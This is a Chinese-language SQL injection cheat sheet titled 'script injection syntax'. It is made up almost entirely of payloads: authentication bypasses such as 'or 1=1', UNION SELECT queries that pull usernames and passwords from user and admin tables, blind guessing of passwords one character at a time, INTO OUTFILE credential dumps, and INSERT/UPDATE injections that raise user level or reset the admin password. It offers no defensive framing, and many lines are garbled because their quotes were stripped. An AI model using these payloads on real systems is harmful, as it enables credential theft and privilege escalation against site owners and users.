脚本注入语法.doc

or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 union select 1,1,1 from user userid=1 and password=mypass userid=1 and mid(password,3,1)=char(112) userid=1 and mid(password,4,1)=char(97) and ord(mid(password,3,1)111 （ord函数很好用，可以返回整形的） and LENGTH(password)=6（探测密码长度） and LEFT(password,1)=m and LEFT(password,2)=my 依次类推 union select 1,username,password from user/* union select 1,username,password from user/* = union select 1,username,password from user/* （可以是1或者=后直接跟） 99999 union select 1,username,password from user/* into outfile c:/file.txt （导出文件） = or 1=1 into outfile c:/file.txt 1 union select 1,username,password from user into outfile c:/user.txt SELECT password FROM admins WHERE login=John INTO DUMPFILE /path/to/site/file.txt id= union select 1,username,password from user into outfile id=-1 union select 1,database(),version() （灵活应用查询） 常用查询测试语句， SELECT * FROM table WHERE 1=1 SELECT * FROM table WHERE uuu=uuu SELECT * FROM table WHERE 12 SELECT * FROM table WHERE 32 SELECT * FROM table WHERE 20 THEN 1 END id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 （替换，寻找密码） union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1)=49 （验证第一位密码） union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1)=50 （第二位） union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1)=51 变换id进行测试（meteor） union%20(SELECT%20allowsmilies,public,userid,0000-0-0,user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate union%20(SELECT%20allowsmilies,public,userid,0000-0-0,pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate 构造语句： SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1) SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1) UNION%20(SELECT%201,0,2,1999-01-01,a,password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate UNION%20(SELECT%201,0,12695,1999-01-01,a,password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate UNION%20(SELECT%201,0,12695,1999-01-01,a,userid%20FROM%20user%20WHERE%20username=sandflee)%20order%20by%20eventdate （查沙子的id） （SELECT a FROM table_name WHERE a=10 AND B=1 ORDER BY a LIMIT 10) SELECT * FROM article WHERE articleid=$id UNION SELECT * FROM（字段和数据库相同情况下，可直接提交） SELECT * FROM article WHERE articleid=$id UNION SELECT 1,1,1,1,1,1,1 FROM（不同的情况下） 特殊技巧：在表单，搜索引擎等地方写： “_” “._ ” “% % ORDER BY articleid/* % ORDER BY articleid# _ ORDER BY articleid/* _ ORDER BY articleid# $command = dir c:;system($command); SELECT * FROM article WHERE articleid=$id SELECT * FROM article WHERE articleid=$id 1 and 1=2 union select * from user where userid=1/* 句中变为 (SELECT * FROM article WHERE articleid=1 and 1=2 union select * from user where userid=1/*) 1 and 1=2 union select * from user where userid=1 语句形式：建立一个库，插入： CREATE DATABASE injection CREATE TABLE user ( userid int(11) NOT NULL auto_increment, username varchar(20) NOT NULL default , password varchar(20) NOT NULL default , PRIMARY KEY (userid) ) ; INSERT INTO user VALUES (1, swap, mypass); 插如一个注册用户： INSERT INTO user (userid, username, password, homepage, userlevel) VALUES (, $username, $password, $homepage, 1); “INSERT INTO membres (login,password,nom,email,userlevel) VALUES ($login,$pass,$nom,$email,1); INSERT INTO membres (login,password,nom,email,userlevel) VALUES (,3)#,1) INSERT INTO membres SET login=$login,password=$pass,nom=$nom,email=$email; INSERT INTO membres SET login=,password=,nom=,userlevel=3,email= INSERT INTO membres VALUES ($id,$login,$pass,$nom,$email,1); UPDATE user SET password=$password, homepage=$homepage WHERE id=$id UPDATE user SET password=MD5(mypass) WHERE username=admin#), homepage=$homepage WHERE id=$id UPDATE membres SET password=$pass,nom=$nom,email=$email WHERE id=$id; UPDATE membres SET password=PASS,nom=,userlevel=3,email= WHERE id=ID UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews=$id; 长用函数： DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER() 比如： UPDATE article SET title=$title WHERE articleid=1 对应函数 UPDATE article SET title=DATABASE() WHERE id=1 #把当前数据库名更新到title字段 UPDATE article SET title=USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=SYSTEM_USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=SESSION_USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=CURRENT_USER() WHERE id=1 #把当前会话被验证匹配的用户名更新到title字段 ： $req = SELECT * FROM membres WHERE name LIKE %$search% ORDER BY name; SELECT * FROM membres WHERE name LIKE % ORDER BY uid#% ORDER BY name SELECT * FROM membres WHERE name LIKE % ORDER BY uid#% ORDER BY name SELECT uid FROM admins WHERE login= OR a=a AND password= OR a=a